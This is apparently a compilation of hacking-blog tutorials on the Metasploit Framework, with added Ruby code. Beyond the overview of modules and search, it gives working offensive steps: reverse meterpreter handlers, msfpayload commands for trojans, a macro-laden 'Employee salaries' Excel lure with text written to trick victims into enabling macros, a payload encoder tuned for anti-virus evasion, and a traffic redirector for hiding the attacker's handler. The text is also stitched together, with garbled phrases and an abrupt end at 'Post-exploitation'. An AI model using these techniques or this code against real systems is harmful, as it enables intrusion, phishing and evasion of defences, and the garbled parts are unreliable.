Exploiting vulnerabilities with the Metasploit Framework: a Metasploit usage guide (Metasploit on Kali)

We have written many articles on hacking and on using Metasploit, including how not to leave traces, a tour of its internal architecture, and a number of cheat sheets of commands and scripts.

With this article we begin a comprehensive series for those starting out with Metasploit. This first part is important even though it only briefly reviews the basics of Metasploit, one of the most powerful hacking platforms on the planet.

How to install Metasploit

Metasploit is an open-source project started by the hacker HD Moore in 2003. It was originally written in Perl, but in 2007 it was completely rewritten in Ruby. In 2009 it was acquired by Rapid7, a company specialising in information-security services that also produces the Nexpose vulnerability scanner.

Metasploit version 4.12 is already included in the Kali Linux distribution, as it was in BackTrack before it. If you use another Linux distribution or macOS, you will have to download it from the Rapid7 site.

If you use Windows, you will likewise have to download Metasploit from the Rapid7 site, but we do not recommend running it on Windows. You can, of course, but many of the features we cover in this article simply do not work there.

Metasploit comes in several editions, including Metasploit Pro (the full commercial version) and the Community Edition (free). The latter is what ships in Kali. We concentrate on the Community Edition, since we assume most of you will not be buying the Pro version at $30,000.

Ways of using Metasploit

Metasploit can be used in several ways. The most common, and the one we use almost all the time, is the interactive Metasploit console. It is started by typing msfconsole at the Kali command line. There are several other methods as well.

Msfcli

You can also use Metasploit from the Kali command line, in msfcli mode. At first glance it may seem that when we are in the console we are using the command line. In fact we are using an interactive console with its own keywords and commands. With msfcli, on the other hand, we really are using the Linux command line.

To see information about all available msfcli commands, type at the console:

kali > msfcli -h

Now, to run an exploit with msfcli, type:

kali > msfcli <exploit> payload=<payload> rhost=<target IP> lhost=<your IP> E

where E is short for Execute.

Our article on building payloads that evade anti-virus uses the msfencode and msfpayload commands in this same command-line (msfcli) mode. Note that msfcli, msfpayload and msfencode were all removed from the framework in 2015; their functions now live in msfconsole (its -x option runs commands non-interactively) and in msfvenom.

The drawback of msfcli is that it is not as well supported as msfconsole and is limited to a single shell, which makes working with complex exploits impossible.

Armitage

If you want to use Metasploit with a graphical interface (GUI), there are several options. For example, Raphael Mudge wrote Armitage (named after one of the main characters of the great cyberpunk novel "Neuromancer", which every hacker who respects the SciFi genre should read).

To run Armitage in Kali, just enter:

kali > armitage

If Armitage cannot connect, try these commands (note that the service name comes before the action; if the metasploit service was already running, stop it first with service metasploit stop and start it again):

kali > service postgresql start
kali > service metasploit start

Armitage is a graphical interface on top of Metasploit built on a client-server architecture. You run Metasploit as the server, and Armitage becomes your client, giving you full access to Metasploit's functions through a complete, if not very intuitive, GUI. If you really need a GUI to feel comfortable, by all means use Armitage. But being at home on the command line is a practical necessity for any self-respecting hacker.

Modules

Metasploit has six kinds of modules:

  1. payloads
  2. exploits
  3. post
  4. nops
  5. auxiliary
  6. encoders

Payloads are the code we leave running on the compromised system. Elsewhere they go by names such as shellcode or listeners; in Metasploit they are simply payloads. They include command shells, Meterpreter and more, and come in several flavours, for example staged, inline, NoNX (works around the No-Execute feature of modern processors), PassiveX (gets past firewall rules on outbound traffic), IPv6 and others.

Exploits are the code that takes advantage of a specific vulnerability in a system. They are very specific: there are exploits for a particular operating system, service pack (SP), service, port or application. They are also classified by operating system, so an exploit for Windows will not work on Linux and vice versa.

Post modules are used for post-exploitation work on a system (after access has already been gained).

Nops is short for No OPerationS. On x86 processors a NOP is the byte 0x90, which simply tells the CPU to do nothing; runs of them (NOP sleds) are useful padding in buffer-overflow attacks because they give the return address some slack. The nops modules can be listed with the show command:

msf > show nops

Auxiliary covers a large number of modules (695) that do not fit any of the other categories: fuzzers, scanners, DoS modules (for example against VMware) and much more. For details see our article on auxiliary modules.

Encoders are modules that transform our payloads in various ways to get them past anti-virus and other security products. We can list them with:

msf > show encoders

As you can see, Metasploit ships with a lot of encoders. One of our favourites is shikata_ga_nai, which applies a polymorphic XOR transformation to the payload and helps it evade anti-virus and other defences. Bear in mind that its decoder stub is itself well known to modern anti-virus engines, so encoding alone is no longer a reliable evasion technique.
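To show what an encoder like shikata_ga_nai actually does to the bytes, here is an added example in Ruby; it is not Metasploit's encoder code and is not byte-compatible with it. Each 32-bit word of the payload is XORed with the current key, and the key is then advanced by adding the encoded word (additive feedback), so no fixed byte pattern survives and a different key gives a completely different blob. It goes one step beyond the text above and also searches for a key that keeps the output free of "bad characters" such as NUL, which is what msfencode -b '\x00' does for an exploit that cannot carry NUL bytes. The sample payload bytes and all function names are constructed for the example; a real encoder additionally prepends an x86 decoder stub, which is omitted here.

```ruby
# Added example, not Metasploit's encoder: a shikata_ga_nai-style additive
# feedback XOR transform on 32-bit little-endian words, plus a bad-character
# aware key search. Only the data transform is modelled; the polymorphic x86
# decoder stub that a real encoder emits in front of the blob is omitted.

WORD_MASK = 0xFFFFFFFF
NOP = "\x90".b   # x86 NOP, used here only as 4-byte alignment padding

# Constructed stand-in for shellcode (not a working payload); it contains NUL
# bytes on purpose so the bad-character search has something to eliminate.
SAMPLE_PAYLOAD = [0x31, 0xc0, 0x50, 0x68, 0x63, 0x61, 0x6c, 0x63,
                  0x54, 0x5b, 0x50, 0x53, 0xb8, 0x00, 0x00, 0x00, 0x00].pack("C*")

# Pad to a multiple of 4 bytes so the blob splits into whole words.
def pad4(payload)
  bin = payload.b
  bin + NOP * ((4 - bin.bytesize % 4) % 4)
end

# Encode: enc_i = word_i XOR key_i ; key_{i+1} = key_i + enc_i (mod 2^32).
# Because the next key depends on the *encoded* word, a decoder only needs the
# initial key and recomputes the chain as it walks the blob.
def xor_feedback_encode(payload, key)
  out = String.new(encoding: Encoding::BINARY)
  pad4(payload).unpack("V*").each do |word|
    enc = (word ^ key) & WORD_MASK
    out << [enc].pack("V")
    key = (key + enc) & WORD_MASK
  end
  out
end

# Decode mirrors the encoder, advancing the key with the encoded word just read.
def xor_feedback_decode(blob, key)
  out = String.new(encoding: Encoding::BINARY)
  blob.unpack("V*").each do |enc|
    out << [(enc ^ key) & WORD_MASK].pack("V")
    key = (key + enc) & WORD_MASK
  end
  out
end

# Try random keys until neither the key itself nor the encoded blob contains a
# forbidden byte. Returns [key, blob], or nil if no key was found in `tries`.
def encode_avoiding(payload, badchars, tries: 1000, rng: Random.new(1))
  bad = badchars.b.bytes
  tries.times do
    key = rng.rand(1..WORD_MASK)
    blob = xor_feedback_encode(payload, key)
    next if ([key].pack("V").bytes & bad).any?
    next if (blob.bytes & bad).any?
    return [key, blob]
  end
  nil
end

# Crude signature check: bytes of the raw payload that survive unchanged at the
# same offset in the encoded blob.
def unchanged_bytes(raw, blob)
  pad4(raw).bytes.zip(blob.bytes).count { |a, b| a == b }
end

if __FILE__ == $0
  key, blob = encode_avoiding(SAMPLE_PAYLOAD, "\x00")
  puts "key 0x%08x, %d bytes, %d unchanged, NULs left: %d" %
       [key, blob.bytesize, unchanged_bytes(SAMPLE_PAYLOAD, blob), blob.count("\x00")]
end
```

The decoder needs only the initial key, so the key is the one value the decoder stub has to carry, which is why the search rejects keys that themselves contain a bad byte.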

Search

Metasploit 4 added a search feature. Before that you had to use msfcli and grep to find modules. Rapid7 has since added keyword search and other refinements, and the addition came none too soon: Metasploit had grown so much that grep was no longer enough to find your way among more than 1400 exploits.

Keyword search lets you do a simple search or a more precise one. For example, we can restrict the type of module we want with the type keyword:

msf > search type:exploit

If we do that, Metasploit lists 1295 exploits. Not very useful.

But if we know we want to attack a Sun Microsystems machine running Solaris (Sun UNIX), we can narrow the search to Solaris exploits only, using the platform keyword:

msf > search type:exploit platform:solaris

Now our search is reduced to the handful of exploits that work against Solaris.

To narrow it further, suppose we want to attack Solaris RPC (sunrpc) and are only interested in exploits for that specific service. We add the keyword sunrpc to the search, as shown below:

msf > search type:exploit platform:solaris sunrpc

As you can see, the search is now down to five exploit modules!
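The narrowing above works because every term in the query must match. The following added example in Ruby (not Metasploit's search code) models that behaviour over a small module catalogue: key:value terms match one field, bare words match the name, description or references, and the result set can only shrink as keywords are added. The catalogue is constructed for the example; its paths mimic Metasploit's layout but it is not a real module list.

```ruby
# Added example, not Metasploit's search implementation: a model of the keyword
# search. "key:value" terms match one field, bare words match anywhere, and all
# terms are ANDed, which is why each extra keyword narrows the result set.

# Constructed module catalogue (paths mimic Metasploit's layout, not a real list).
MODULES = [
  { type: "exploit",   name: "solaris/sunrpc/ypupdated_exec", platform: ["solaris"],
    refs: ["CVE-1999-0208"], desc: "Solaris ypupdated Command Execution" },
  { type: "exploit",   name: "solaris/sunrpc/sadmind_exec",   platform: ["solaris"],
    refs: ["CVE-2003-0722"], desc: "Solaris sadmind Command Execution" },
  { type: "exploit",   name: "solaris/telnet/ttyprompt",      platform: ["solaris"],
    refs: ["CVE-2001-0797"], desc: "Solaris in.telnetd TTYPROMPT Buffer Overflow" },
  { type: "exploit",   name: "windows/smb/ms08_067_netapi",   platform: ["windows"],
    refs: ["CVE-2008-4250", "MS08-067"], desc: "MS08-067 Server Service Relative Path Stack Corruption" },
  { type: "auxiliary", name: "scanner/misc/sunrpc_portmapper", platform: [],
    refs: [], desc: "SunRPC Portmap Program Enumerator" },
  { type: "auxiliary", name: "scanner/portscan/tcp",          platform: [],
    refs: [], desc: "TCP Port Scanner" },
  { type: "post",      name: "windows/gather/hashdump",       platform: ["windows"],
    refs: [], desc: "Windows Gather Local User Account Password Hashes" },
]

# "type:exploit platform:solaris sunrpc" becomes
# [[:type, "exploit"], [:platform, "solaris"], [:any, "sunrpc"]].
def parse_query(query)
  query.split.map do |tok|
    key, value = tok.split(":", 2)
    value ? [key.downcase.to_sym, value.downcase] : [:any, tok.downcase]
  end
end

def term_matches?(mod, field, value)
  case field
  when :type     then mod[:type] == value
  when :platform then mod[:platform].any? { |p| p.include?(value) }
  when :name     then mod[:name].downcase.include?(value)
  when :cve      then mod[:refs].any? { |r| r =~ /\ACVE-/i && r.downcase.include?(value) }
  when :any      then [mod[:name], mod[:desc], *mod[:refs]].any? { |s| s.downcase.include?(value) }
  else false   # an unknown keyword matches nothing rather than everything
  end
end

# Every term must match, so each added keyword can only remove results.
def search_modules(query, catalogue = MODULES)
  terms = parse_query(query)
  catalogue.select { |m| terms.all? { |f, v| term_matches?(m, f, v) } }
           .map { |m| "#{m[:type]}/#{m[:name]}" }
end

if __FILE__ == $0
  ["type:exploit", "type:exploit platform:solaris",
   "type:exploit platform:solaris sunrpc"].each do |q|
    puts "#{q.ljust(40)} -> #{search_modules(q).size} result(s)"
  end
end
```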

Metasploit has many more capabilities, which we will keep exploring in the upcoming Metasploit articles. In the meantime, try the Metasploit hacks described in other posts on the site. Come back, learn Metasploit and start hacking like a professional!

Disclaimer: this article was written for educational purposes only. The author never intended it for illegal use. If readers use this information for their own ends, the author naturally bears no responsibility for any harm or damage.

What is Metasploit?

Metasploit (it is more correct to speak of Metasploit as a project) is a computer-security project that gives interested parties (above all security specialists and administrators) information about possible vulnerabilities in security systems and helps test systems and networks so that, once the holes are closed, they are safe and protected. For developing such exploits there is a dedicated environment, the Metasploit Framework. It has grown into a subproject of its own: a software environment and platform for developing and running exploits against a remote machine. Whether using the platform, and the project as a whole, is ethical remains a slippery question, since an environment built so that administrators can test the security of their systems is just as successfully used by hackers to write and run new exploits and gain unauthorised access to resources.

Since its launch in 2003 the Metasploit Framework has changed a great deal and reaches us today under a broad licence, in both free and commercial versions. The builds include many ready-made exploits that help you deal with the problems you identify. It runs without difficul ty on both Unix and Windows systems, and there are several interfaces to choose from, down to one that runs in a browser window.

How to use the Metasploit Framework, or what is Metasploit? The basic principles of the environment.

Before working in the framework it is absolutely necessary to collect as much information as possible about the target computer, so you have to go through a whole set of steps before you get to choosing an exploit and a payload.

How to use the Metasploit Framework?

Here it is:

https://www.metasploit.com/download/

But don't rush. The framework is also bundled in a number of system builds (Linux distributions) that are distributed free of charge; we have covered them in the Linux section of the blog. Since it is part of many of those builds, that is the safest way to get into the environment.

Getting to know the shell

Depending on the type of exploit, once it has fired we end up with either a remote shell or a Meterpreter shell.

A shell is a command-line (terminal) program through which you enter commands on the remote computer as if you were sitting at its keyboard; it is the counterpart of the desktop in Windows. The plain shell is used when the hacker intends to run ordinary commands on the victim's computer. When it comes to more complex manipulation within the current session, and building commands with extra flags, the Meterpreter shell is used instead.

A bit more about Meterpreter. The Meterpreter shell already brings a whole set of ready-made tools with it: utilities and scripts for gathering information on the remote computer, tools for controlling devices such as the microphone and webcam, and so on. As the technology develops, that set of ready-made tools keeps growing and improving. Now a little more detail on all of this.

Finding and configuring an exploit

I assume you are already in Kali. We launch Metasploit and issue the command that lists the available exploits, show exploits:

The terminal prints the exploits in alphabetical order. Don't forget that the search can be narrowed with keywords, for example by:

  • Common Vulnerabilities and Exposures identifier (CVE ID). You can enter, for instance:
search cve:2017

  • Microsoft Security Bulletin
search MS
  • the name of the program, vendor or device of interest
search Netgear

  • And once a candidate is chosen, all the information about the vulnerability the exploit was written for is printed by the info command (the terminal's own hints point you to it as well). Take a look:

All of that is material for your analysis and use. Before going into the exploit's configuration, we load the vulnerability module into the console with the use command

or, going back to one of the earlier screenshots, pick whichever exploit you like and load it:

And we can immediately check what it does and what it needs by running the familiar info command in the context of the exploit:


Exploit configuration: setting options

The set command is what points Metasploit in the right direction. In msf it looks like this:

set VARIABLE value

To find out which variables the exploit has, use the command show options

The Module options section, familiar from the output of the info command, shows what has to be configured once the module is loaded. The module tells you straight away what it needs in order to be used against the vulnerability by marking the required options (the Required column reads yes for settings that must be filled in and no for those that are optional). To use the exploit the pentester needs:

  • the address of the remote system (RHOST)
  • the remote port, 8080 in this case (RPORT)
  • the target location (TARGETURI): the path to the vulnerable component on the system, or on the victim's device (for example, when a router is attacked this is the path to the vulnerable file at the given address)

Let's round out the picture. Launching the exploit in our lab looks roughly like this:

msf > use <path as shown by search>/netgear_nms_rce
msf exploit(netgear_nms_rce) > set RHOST 10.10.10.10
msf exploit(netgear_nms_rce) > set RPORT 8080
msf exploit(netgear_nms_rce) > set TARGETURI <path>
msf exploit(netgear_nms_rce) > exploit -j

Not all of the commands above are mandatory for every module; more details follow below.

Choosing and building a payload

What good is access to someone else's computer if we cannot do anything with it? That is what the payload is for. In Metasploit terms the payload is the part of the malicious software designed to make use of the system's functionality, whereas other parts of the software may serve supporting functions (copying and reproducing itself, say; think of a computer virus). As you might guess, a payload can be a single piece of code or be assembled from several options.

Working in the Metasploit environment, you can look at the ready-made payloads available for the exploit you have selected. The command

show payloads

lists them for the loaded exploit. Another option is to type

set payload

with the exploit loaded and press Tab twice. Metasploit asks whether you want to see all the payloads, and the terminal then lists them in the format operating system/shell type. For example

set payload windows/shell_reverse_tcp

All that is left is to pick the OS and the kind of payload that suits you. The most popular payload types are the shells discussed above (remote shells and the Meterpreter shell).

The choice of payloads in the framework is very wide, and it matters as much as the choice of exploit, because the payload is what extracts the information the hacker wants from the victim's system. Typical shells built on reverse_tcp are the most useful here: by connecting back from the remote system to the attacker they hand over the data, often without raising suspicion on the system firewall.

That's all for now. Good luck.

Seven years after it first appeared, MSF has grown from a simple framework for writing working exploits into a kind of Swiss army knife, and by now into a whole environment for conducting pentests, with everything needed from information gathering to post-exploitation. Not for nothing is MSF among the five most used tools. And why not: MSF keeps growing and developing! In which directions, you will learn from this article.

Originally the article was meant to describe the possibilities for automating actions in MSF, but after looking at what people actually know about the framework, it seemed better to cover most of its capabilities and talk about automation along the way. People shouldn't have to reinvent the wheel :).

Speaking of knowledge: it is not surprising there is so little of it, since there are no comprehensive articles or books about Metasploit in Russian. So the main sources are foreign blogs and your own research. Still, don't worry: Ruby is simple, and from other people's examples you can pick up everything you need.
By the way, everything described here applies to the latest version at the time of writing, MSF 3.4.2.

The GUI is back!

For those who dislike the console or are too lazy to learn the MSF commands, there used to be a GTK-based GUI shell. Used to be, because it was dropped as of version 3.3. No great loss, and the same happened to msfweb. It could still be used, but there were stability problems, and... oh well!

But just as this article was being prepared, good news arrived: a new GUI. It has changed both inside and out. To be precise, it is written in Java, so it is cross-platform, and it talks to MSF over the XML-RPC interface, so it can also be driven remotely.

Starting it takes two steps: first msfrpcd, then a connection to it from msfgui. If msfgui runs on the same machine as the server, you can simply click "start new msfrpcd".

Windows version:

  1. Launch the Cygwin console
  2. cd /msf3
  3. msfrpcd -S -U username -P password, where -S means an SSL connection and -U/-P set the login and password
  4. launch msfgui.jar, which lives in %MSF%\msf3\data\gui, either by double-clicking it or from the console (not Cygwin): java -jar msfgui.jar

In msfgui enter the login, password, port and IP, and connect.

Some things the old GUI had are apparently not there yet, such as access to the console or viewing logs. Still, it is usable, especially when you need to quickly walk through plugins and modules, poke around someone else's computer, and so on.

Information gathering

You may know that MSF uses a database to store the information its modules exchange. This part is being actively developed.

At present the only supported database is PostgreSQL. SQLite was dropped because of performance and scalability problems, and MySQL has now gone too. Installing Postgres should not cause any trouble, and the driver for talking to it is bundled with MSF.

Under Windows: install it, set the password for the postgres user and the port.

Through pgAdmin: connect to the local server, create another user under "Login Roles" (msf_user) and a database under "Databases" (msf_db). There you can also configure the SQL server itself, making it "secure", and browse the MSF tables.

msf> db_driver postgresql
msf> db_connect msf_user:<password>@<host>:5432/msf_db

Note that the db_create command no longer exists; you can only connect to an existing database, and if you have sufficient privileges (like the postgres user) the database is created automatically. Otherwise create the database by hand in Postgres.

That is not so bad, though, since workspaces are available too. There is one database and one set of tables, but modules exchange and add information within the current workspace. db_workspace will help you sort this out.

Briefly, the commands:

  • db_services lists the ports/services found by modules, imported from nmap, or imported from third-party programs. db_autopwn with the -p parameter (by port) works from this data;
  • db_notes holds "notes", such as the OS version obtained from Nmap or "details" obtained from WMap. Unfortunately db_autopwn does not seem to consult db_notes when choosing an exploit;
  • db_vulns holds vulnerabilities found by MSF modules (WMap) or imported from Nessus (OpenVAS) or Nexpose. db_autopwn with the -x parameter (by vulnerability) works from this data.

For example, scan a host with nmap and send the results into our database:

msf> db_nmap -PN -sV 192.168.0.101

The output of MSF's own port-scanner module is similar, and its data also goes into the database. For specific services you need other modules (all the aux modules ending in _version in the scanner section, for example scanner/imap/imap_version).

msf> use scanner/portscan/tcp
msf> set RHOSTS 192.168.0.101
msf> set PORTS 1-1000
msf> run -j

To automate the above you can use what MSF calls resource files. Essentially these are plain text files with a sequence of msfconsole commands. For example, let's make a resource file for quickly starting a "server" (handler) for a reverse meterpreter. Put the following commands in a file (metrevhandl.rc):

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.0.102
exploit -j
back

Let’s run our script using the additional “resource”:

msf> resource metrevhandl.rc

Yak bachish - very handy. That's not all. The best thing is that in these scripts you can write code in Rubi, which allows us, for example, to interoperate between adjacent MSF modules.

Before speaking, home/.msf3/msfconsole.rc is a script that is automatically launched when msfconsole starts. It’s really easy to block the connection from the database, for example.
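Resource files are just text, so they can be generated rather than typed. The following added example in Ruby (not Metasploit's own tooling) builds two of them: a handler like metrevhandl.rc above, and a multi-host port scan whose loop lives in an embedded <ruby> block of the kind mentioned above, using run_single, the method Metasploit exposes to such blocks for issuing console commands. Host and port values are checked before they are written, so a typo fails here rather than inside a running console. Function names, the ExitOnSession setting and the sample hosts are the example's own choices.

```ruby
# Added example, not part of Metasploit: generate resource files from Ruby.
# The output is what `msfconsole -r file.rc` or `resource file.rc` reads.
require "ipaddr"

# Accept an IPv4/IPv6 address or CIDR range (what RHOSTS/LHOST take); reject the rest.
def validate_host!(host)
  IPAddr.new(host)
  host
rescue IPAddr::Error
  raise ArgumentError, "not an IP address or CIDR range: #{host.inspect}"
end

def validate_port!(port)
  p = Integer(port, exception: false)
  raise ArgumentError, "bad port: #{port.inspect}" unless p && (1..65535).cover?(p)
  p
end

# Handler for a reverse payload, like metrevhandl.rc above, but with
# ExitOnSession false so the handler keeps accepting further sessions.
def handler_rc(payload:, lhost:, lport:)
  validate_host!(lhost)
  port = validate_port!(lport)
  <<~RC
    use exploit/multi/handler
    set PAYLOAD #{payload}
    set LHOST #{lhost}
    set LPORT #{port}
    set ExitOnSession false
    exploit -j -z
  RC
end

# Port scan of several targets in one file. The <ruby> block is executed by
# msfconsole itself, so the loop issues console commands through run_single;
# the "\#{target}" below is deliberately left for msfconsole's Ruby to expand.
def scan_rc(hosts, ports: "1-1000")
  hosts.each { |h| validate_host!(h) }
  <<~RC
    use auxiliary/scanner/portscan/tcp
    set PORTS #{ports}
    <ruby>
    #{hosts.inspect}.each do |target|
      run_single("set RHOSTS \#{target}")
      run_single("run")
    end
    </ruby>
  RC
end

if __FILE__ == $0
  # Sample values constructed for the example (addresses from the article).
  puts handler_rc(payload: "windows/meterpreter/reverse_tcp", lhost: "192.168.0.102", lport: 4444)
  puts scan_rc(["192.168.146.0/24", "192.168.0.101"])
end
```

Write the returned text to a file and load it with resource, or put the handler into ~/.msf3/msfconsole.rc so the listener is up as soon as the console starts.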

Moving on...

WMAP. WMAP is an attempt to adapt MSF to web applications and automate everything in that area. The project is still in its infancy and does not perform well, especially compared with its competitors. It is unlikely to develop much, at least on its own, because Rapid7 has started to fund the open-source w3af framework heavily, which is dedicated to the web, so we can expect the functionality of MSF and w3af to be merged. Still, a small example (it needs a database connection):

1. Load the wmap plugin:

msf> load db_wmap

2. Add the victim:

msf> wmap_targets -a http://www.example.com/

3. List the tests, then run the modules against our victim:

msf> wmap_run -t
msf> wmap_run -e

The results are stored in the database and are accessible through db_vulns and db_notes.

Some modules need their parameters adjusted; the setg command helps with that. WMAP also has a crawler (wmap_crawler) and can work through a proxy (wmap_proxy).

Also, for those who like to torture databases with all sorts of injections, I recommend the MSF module scanner/http/sqlmap, a port of the tool of the same name, SQLmap. Quite a powerful thing, by the way :). Information about the tool can be found on its authors' site.

db_autopwn

Automatic exploitation in MSF has gained a couple of new parameters:

  • -R sets the minimum rank of the exploits to be used;
  • -m sets a regexp for selecting exploits.

For example:

msf> db_autopwn -t -p -m windows -R excellent

You get a list of the most reliable exploits for standard Windows services. (db_autopwn was removed from the framework in 2011; this section applies to the 3.x versions discussed here.)

By the way, since version 3.3.1 Nexpose can be driven straight from MSF, with exploits launched automatically for the problems it finds.

1. Load the plugin and connect to Nexpose:

msf> load nexpose
msf> nexpose_connect msf_user:<password>@<host>

2. Launch only the most reliable exploits for the vulnerabilities found:

msf> nexpose_scan -R excellent -x 192.168.0.101

Browser_autopwn

Whereas the previous section dealt with standard server-side exploits, this one is about client-side ones, aimed at the victims' browsers, as the name suggests.
Essentially the module starts an HTTP server and loads all the browser exploits into it. When a victim visits our server, the module detects the browser version and OS and then launches the matching exploit. The module's main strength at the moment is accurate browser/OS detection: it uses both server-side and client-side (JavaScript) techniques, so you cannot fool it simply by changing the User-Agent.

The exploits it carries target old versions of browsers, but the best part is that you can easily add your own, and that is its real power. A free exploit pack, in effect.

Future versions are expected to add obfuscation of the exploits (so anti-virus does not flag them) and a choice of payload.

For example, let's start a server with backconnect shells to 192.168.0.102 (the option that sets the URL is URIPATH):

msf> use server/browser_autopwn
msf> set LHOST 192.168.0.102
msf> set URIPATH index.php
msf> exploit -j

VBA

In the EasyHack column I already wrote about building trojans with MSF, that is, sending exe files, which is rather crude. Users have become wary and no longer open everything they are sent, and there is the detection problem as well. Office documents are a much better vehicle for all of this:

msfpayload windows/shell_bind_tcp LPORT=5555 V > macros.vba

(msfpayload has since been removed; in current versions the same output comes from msfvenom with -f vba.) Next we create, say, an Excel document with a scary name like "Employee salaries". Then we open the VBA output: the macro text (MACRO CODE) goes into the document's macro (Tools -> Macro -> VB Editor) and the document body gets our "payload" (PAYLOAD DATA). You can dress the document up any way you like. Since macros are disabled by default (from Office XP onwards, as far as I know), put a notice of the form "Attention! Working with the database is only possible with macros enabled. To enable them go to Tools -> Options -> Security -> Macro Security -> Low and reopen the document" into the document, and the user will enable the macros for you. The result is a shell on port 5555.

Payloads

The choice of payload is an important matter. MSF has a great many of them, so I'll go through them briefly (mostly the Win* ones) to give a deeper understanding. First of all they are divided by OS, and also by software and by the interpreters of interest (ruby, perl).

The general gist of the descriptions:

  • "Inline": single-stage, "whole" payloads. They are large, so they do not fit into every exploit;
  • "Stager": a staged payload, split into parts. A small stub goes into the exploit, mainly to set up the connection; the rest is delivered once the connection is up;
  • "Ord": ordinal payloads. Small, but tied to static addresses in the memory of a system DLL;
  • "Bind": opens a port and waits for a connection;
  • "Reverse": a backconnect shell;
  • "Findport": searches for the socket the exploit arrived through and talks over it. The search is by port number;
  • "Findtag": like the previous one, but the socket is found by reading every available socket for a 4-byte tag sent by the hacker;
  • "Exec, Download_exec, Up_exec": run a command; download/upload and run;
  • "VNC": starts a VNC server on the victim;
  • "dllinjection": injects a DLL into process memory. There are two kinds of DLL injection;
  • "metsvc": uploads a full meterpreter to the victim and registers it as a service;
  • "PassiveX": our shell works as an ActiveX component;
  • "NoNX": shellcode that bypasses the DEP memory-protection mechanism;
  • "DNS": payloads that can be pointed at host names rather than IPs;
  • "HTTPS": a shell that talks over encrypted HTTPS (without proxy support, naturally).

I'll dwell on PassiveX a little, because it is so good.
The point is that our shell registers itself as an ActiveX component, and the interaction goes through a hidden instance of IE over HTTP. This is really cool, especially when you are in a corporate network where everything sits behind NAT and a strict firewall that only lets HTTP traffic out through the corporate proxy. In that case nothing else helps, especially if you do not know the proxy settings. Here, all the proxy settings and the authentication on it (if any) are already configured in IE.

It is built, and listened for, like this (192.168.0.102:443):

msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X > reflmeter102.exe

msf> use exploit/multi/handler
msf> exploit -p windows/meterpreter/reverse_http -o PXHOST=192.168.0.102,PXPORT=443,PXURI=/

Moreover, where PassiveX used to work only under IE6, it now works fine under IE7/8.

Let's talk about plain shells. A plain shell is fine, but once you have used meterpreter you want it back.
And now we have that possibility. Say our victim (192.168.0.101) already has a plain bind shell on port 5678.

Connect to it from MSF:

msf> use exploit/multi/handler
msf> exploit -p windows/shell_bind_tcp -o RHOST=192.168.0.101,RPORT=5678

I'd like to say that the next command converts the plain shell into meterpreter, but not quite. MSF simply uploads a meterpreter backconnect and, having launched it, creates another session (a second connection). Good or bad, judge for yourself. For it to work we need to set the global variables for our host (where the reverse connection goes), and then "upgrade" the session (ours is "1"):

msf> setg LHOST 192.168.0.102
msf> setg LPORT 6666
msf> sessions –u 1

As a result we have both the meterpreter and the original shell.

By the way, about meterpreter: attempts to port it to other platforms (Linux, macOS) have been going on for a long time, but not everything is smooth there yet. In any case there is good news: as I understand it, meterpreter is being ported to PHP! I don't think every function can be implemented in PHP, but most of them are already available. So you can compromise a web server and enjoy such a cool shell there.

Now a word about safety. Since most MSF modules do not support proxies, working "in the field" is particularly difficult. We don't want to be traced, after all :). So we recall an old-school trick: port forwarding.

Say our MSF server, the one waiting for backconnect shells, is at 192.168.0.103:5555. Then on a throwaway server, on port 80, we hang netcat:

ncat --sh-exec "ncat 192.168.0.103 5555" -l 80 --keep-open

And in the payloads we put the IP (or DNS name) and port of the throwaway server.
By the way, ncat supports SSL, which lets you encrypt traffic that the shell itself cannot.
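What that ncat one-liner does is worth seeing spelled out, so here is an added example in Ruby, not from the original article: a small TCP redirector that listens on the throwaway host and, for every shell that connects, opens a connection to the real MSF handler and pumps bytes both ways, half-closing each side when the other reaches EOF so that sessions end cleanly, and accepting further connections like ncat's --keep-open. The payload only ever sees the redirector's address. The addresses in the final block come from the article; the echo server that stands in for the MSF handler, and the function names, are the example's own.

```ruby
# Added example, not from the original article: a TCP redirector equivalent to
# `ncat --sh-exec "ncat HANDLER 5555" -l 80 --keep-open`.
require "socket"

# Copy bytes from one socket to the other until EOF, then half-close the
# destination so the peer sees EOF too (ncat's default behaviour).
def pump(from, to)
  IO.copy_stream(from, to)
rescue IOError, SystemCallError
  # the peer went away; fall through to the half-close below
ensure
  begin
    to.close_write
  rescue IOError, SystemCallError
    # already closed
  end
end

# Bridge one accepted client to the upstream handler, in both directions.
def relay_connection(client, target_host, target_port)
  upstream = TCPSocket.new(target_host, target_port)
  [Thread.new { pump(client, upstream) },
   Thread.new { pump(upstream, client) }].each(&:join)
rescue SystemCallError => e
  warn "relay to #{target_host}:#{target_port} failed: #{e.message}"
ensure
  client.close unless client.closed?
  upstream.close if upstream && !upstream.closed?
end

# Start the redirector; returns [server_socket, bound_port, accept_thread].
# Port 0 lets the OS pick a free port (used by the demo); use 80 in the field.
def start_redirector(listen_host, listen_port, target_host, target_port)
  server = TCPServer.new(listen_host, listen_port)
  acceptor = Thread.new do
    begin
      loop do
        client = server.accept
        Thread.new(client) { |c| relay_connection(c, target_host, target_port) }
      end
    rescue IOError, SystemCallError
      # server socket closed: stop accepting
    end
  end
  [server, server.addr[1], acceptor]
end

# Minimal "shell" used to exercise the relay: send data, half-close, read reply.
def probe(host, port, data)
  sock = TCPSocket.new(host, port)
  sock.write(data)
  sock.close_write
  sock.read
ensure
  sock&.close
end

# Stand-in for the MSF handler in the demo: echoes everything back, one client at a time.
def start_echo_server(host = "127.0.0.1")
  server = TCPServer.new(host, 0)
  thread = Thread.new do
    begin
      loop do
        sock = server.accept
        begin
          IO.copy_stream(sock, sock)
        ensure
          sock.close
        end
      end
    rescue IOError, SystemCallError
    end
  end
  [server, server.addr[1], thread]
end

# Local end-to-end check: every message goes shell -> redirector -> "handler"
# and back; returns the replies. Several messages on one listener show keep-open.
def demo_roundtrip(*messages)
  echo_srv, echo_port, echo_thr = start_echo_server
  srv, port, acceptor = start_redirector("127.0.0.1", 0, "127.0.0.1", echo_port)
  messages.map { |m| probe("127.0.0.1", port, m) }
ensure
  [srv, echo_srv].each { |s| s&.close }
  [acceptor, echo_thr].each { |t| t&.join(2) }
end

if __FILE__ == $0
  # In the field (needs root for port 80): start_redirector("0.0.0.0", 80,
  # "192.168.0.103", 5555) and join the acceptor thread. Here: local round trip only.
  p demo_roundtrip("hello from the shell", "second session")
end
```

Wrapping the upstream socket in OpenSSL::SSL::SSLSocket would give the encrypted leg that ncat's --ssl provides; the relay logic stays the same.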

Post-exploitation

